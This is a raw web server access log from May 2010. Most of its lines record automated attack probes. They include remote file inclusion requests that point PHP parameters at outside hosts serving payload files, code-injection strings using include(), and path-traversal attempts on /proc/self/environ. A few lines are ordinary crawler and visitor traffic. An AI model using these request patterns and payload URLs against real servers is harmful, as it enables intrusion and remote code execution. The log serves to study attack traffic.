194.150.236.81 - - [02/May/2010:04:30:27 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:30:27 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
194.150.236.81 - - [02/May/2010:04:30:29 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.204.243 - - [02/May/2010:04:31:55 -0500] "GET /logs/access_log.1182816000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.207.4.74 - - [02/May/2010:04:32:51 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "http://tomdolan.pconline.com/logs/access_log.1261699200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.112.180 - - [02/May/2010:04:32:53 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.39.130.176 - - [02/May/2010:04:33:46 -0500] "GET /logs/index.php?option=com_pccookbook&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.39.130.176 - - [02/May/2010:04:33:47 -0500] "GET /index.php?option=com_pccookbook&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
194.150.236.81 - - [02/May/2010:04:37:32 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.221.63.33 - - [02/May/2010:04:41:03 -0500] "GET /src/admin/pt_upload.php?config_file=http://idx.fileave.com/id1.txt??? HTTP/1.0" 404 295 "-""Mozilla/5.0"
66.221.63.33 - - [02/May/2010:04:41:03 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://idx.fileave.com/id1.txt??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
66.221.63.33 - - [02/May/2010:04:41:03 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://idx.fileave.com/id1.txt??? HTTP/1.0" 404 322 "-""Mozilla/5.0"
66.221.63.33 - - [02/May/2010:04:41:03 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://idx.fileave.com/id1.txt??? HTTP/1.0" 404 322 "-""Mozilla/5.0"
207.46.204.241 - - [02/May/2010:04:41:55 -0500] "GET /logs/access_log.1155859200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [02/May/2010:04:42:52 -0500] "GET /logs/access_log.1211932800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.241.190.214 - - [02/May/2010:04:46:05 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://telekotravels.crvnet.es/pollphp/htaccess.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
92.241.190.214 - - [02/May/2010:04:46:05 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://telekotravels.crvnet.es/pollphp/htaccess.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
92.241.190.214 - - [02/May/2010:04:46:05 -0500] "GET /logs/access_log.1266105600//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://telekotravels.crvnet.es/pollphp/htaccess.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.254.228.21 - - [02/May/2010:04:48:33 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.254.228.21 - - [02/May/2010:04:48:33 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.254.228.21 - - [02/May/2010:04:48:33 -0500] "GET /logs/access_log.1270684800%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.254.228.21 - - [02/May/2010:04:53:23 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.254.228.21 - - [02/May/2010:04:53:23 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.254.228.21 - - [02/May/2010:04:53:23 -0500] "GET /logs/access_log.1270684800%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
205.234.232.151 - - [02/May/2010:04:55:26 -0500] "GET //include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
205.234.232.151 - - [02/May/2010:04:55:26 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
205.234.232.151 - - [02/May/2010:04:55:48 -0500] "GET //include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
205.234.232.151 - - [02/May/2010:04:55:48 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
209.90.87.106 - - [02/May/2010:04:57:00 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.834"
209.90.87.106 - - [02/May/2010:04:57:00 -0500] "GET //include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.834"
216.129.119.43 - - [02/May/2010:04:57:12 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 200 643612 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
205.234.232.151 - - [02/May/2010:04:57:58 -0500] "GET //include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
205.234.232.151 - - [02/May/2010:04:57:58 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
205.234.232.151 - - [02/May/2010:04:57:58 -0500] "GET /logs/access_log.1266105600//include/footer.php?_path[counter]=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:04:59:00 -0500] "GET /logs/access_log.1272412800 HTTP/1.1" 200 576125 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [02/May/2010:05:00:03 -0500] "GET /logs/access_log.1215475200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.50 - - [02/May/2010:05:07:55 -0500] "GET /logs/access_log.1222387200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.95 - - [02/May/2010:05:07:55 -0500] "GET /logs/access_log.1241654400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.254.228.21 - - [02/May/2010:05:08:43 -0500] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.254.228.21 - - [02/May/2010:05:08:43 -0500] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.254.228.21 - - [02/May/2010:05:08:43 -0500] "GET /logs/access_log.1270684800%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://lifezi.com/main/fid1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
216.129.119.44 - - [02/May/2010:05:09:12 -0500] "GET /logs/access_log.1212624000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:05:15:18 -0500] "GET /logs/access_log.1251244800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.225 - - [02/May/2010:05:19:25 -0500] "GET /logs/access_log.1255478400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.251.113.36 - - [02/May/2010:05:19:47 -0500] "GET /logs/access_log.1215561600 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1215561600""Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
80.251.113.36 - - [02/May/2010:05:19:49 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
207.46.199.52 - - [02/May/2010:05:19:55 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.45.178.42 - - [02/May/2010:05:20:42 -0500] "GET /index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
207.46.199.52 - - [02/May/2010:05:21:25 -0500] "GET /logs/access_log.1263427200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.142.68.135 - - [02/May/2010:05:23:17 -0500] "GET /logs//admin/auth.php?xcart_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.834"
174.142.68.135 - - [02/May/2010:05:23:17 -0500] "GET //admin/auth.php?xcart_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.13.43 - - [02/May/2010:05:32:24 -0500] "GET /logs/access_log.1242345600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [02/May/2010:05:36:56 -0500] "GET /logs/access_log.1167609600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.45.178.42 - - [02/May/2010:05:44:35 -0500] "GET /logs/access_log.1270512000/index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
207.45.178.42 - - [02/May/2010:05:44:35 -0500] "GET /index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
207.45.178.42 - - [02/May/2010:05:44:35 -0500] "GET /logs/index.php?include_file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
72.26.122.245 - - [02/May/2010:05:45:42 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:05:45:42 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:05:45:42 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:05:45:44 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.142.68.135 - - [02/May/2010:05:45:45 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3993 "-""libwww-perl/5.834"
174.142.68.135 - - [02/May/2010:05:45:46 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
72.26.122.245 - - [02/May/2010:05:45:49 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:05:45:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:05:45:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:05:45:51 -0500] "GET /logs/access_log.1270684800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.199.184 - - [02/May/2010:05:46:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [02/May/2010:05:57:41 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:05:57:43 -0500] "GET /logs/access_log.1242259200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:05:57:45 -0500] "GET /logs/access_log.1265241600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
216.129.119.43 - - [02/May/2010:05:59:48 -0500] "GET /logs/access_log.1271980800 HTTP/1.1" 200 667216 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.39.130.176 - - [02/May/2010:06:00:42 -0500] "GET /logs/page.php?file=com_sermonspeaker&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.65"
211.39.130.176 - - [02/May/2010:06:00:43 -0500] "GET /page.php?file=com_sermonspeaker&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.65"
87.250.255.243 - - [02/May/2010:06:01:18 -0500] "GET /logs/access_log.1272499200 HTTP/1.1" 200 478222 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.104.108 - - [02/May/2010:06:02:26 -0500] "GET /playing.php/common/db.php?commonpath=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
91.121.104.108 - - [02/May/2010:06:02:26 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.104.108 - - [02/May/2010:06:02:26 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
91.121.104.108 - - [02/May/2010:06:02:27 -0500] "GET /playing.php/common/db.php?commonpath=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
91.121.104.108 - - [02/May/2010:06:02:28 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
91.121.104.108 - - [02/May/2010:06:02:28 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.46.195.224 - - [02/May/2010:06:04:25 -0500] "GET /logs/access_log.1200873600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.217.216.132 - - [02/May/2010:06:04:47 -0500] "GET /logs/page.php?file=com_sermonspeaker&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.816"
118.217.216.132 - - [02/May/2010:06:04:47 -0500] "GET /page.php?file=com_sermonspeaker&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.816"
207.46.195.238 - - [02/May/2010:06:05:24 -0500] "GET /logs/access_log.1180396800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.44 - - [02/May/2010:06:12:02 -0500] "GET /logs/access_log.1228867200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:06:22:54 -0500] "GET /logs/access_log.1222128000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.175.39.162 - - [02/May/2010:06:23:23 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:23:23 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:23:23 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:23:24 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:23:24 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:23:24 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:25:01 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:25:01 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:25:01 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:06:37:01 -0500] "GET /logs//adminhead.php?path[docroot]=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:06:37:01 -0500] "GET //adminhead.php?path[docroot]=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:06:37:01 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:06:38:52 -0500] "GET /logs/access_log.1265414400//adminhead.php?path[docroot]=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:06:38:52 -0500] "GET /logs/access_log.1265932800//adminhead.php?path[docroot]=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:06:39:44 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.54 - - [02/May/2010:06:41:25 -0500] "GET /logs/access_log.1197072000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.39.130.176 - - [02/May/2010:06:45:59 -0500] "GET /siakad.html?id=com_simpleboard=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
69.175.39.162 - - [02/May/2010:06:46:49 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:49 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:49 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:51 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:51 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:51 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:55 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:55 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:55 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:57 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:57 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:46:57 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:06:47:35 -0500] "GET /logs/access_log.1265241600/skin/ggambo5100/setup.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:06:47:35 -0500] "GET /skin/ggambo5100/setup.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 309 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:06:47:35 -0500] "GET /logs/skin/ggambo5100/setup.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 314 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:06:47:43 -0500] "GET /logs/skin/ggambo5100/setup.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 314 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:06:47:43 -0500] "GET /skin/ggambo5100/setup.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 309 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:06:47:43 -0500] "GET /logs/access_log.1265241600/skin/ggambo5100/setup.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:49:43 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:49:43 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:49:43 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:50:03 -0500] "GET //auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:50:03 -0500] "GET /logs/access_log.1262476800//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:50:03 -0500] "GET /logs//auction/auction_common.php?phpbb_root_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
212.241.251.224 - - [02/May/2010:06:52:40 -0500] "GET /logs/access_log.1266278400//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
212.241.251.224 - - [02/May/2010:06:52:40 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.241.251.224 - - [02/May/2010:06:52:40 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.8.3.157 - - [02/May/2010:06:52:46 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.8.3.157 - - [02/May/2010:06:52:46 -0500] "GET /logs/access_log.1263859200/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.8.3.157 - - [02/May/2010:06:52:46 -0500] "GET /logs/?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 200 3993 "-""Mozilla/5.0"
61.8.3.157 - - [02/May/2010:06:52:46 -0500] "GET /?sourcedir=http://solid.go.ro/d1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
205.56.129.195 - - [02/May/2010:06:56:13 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
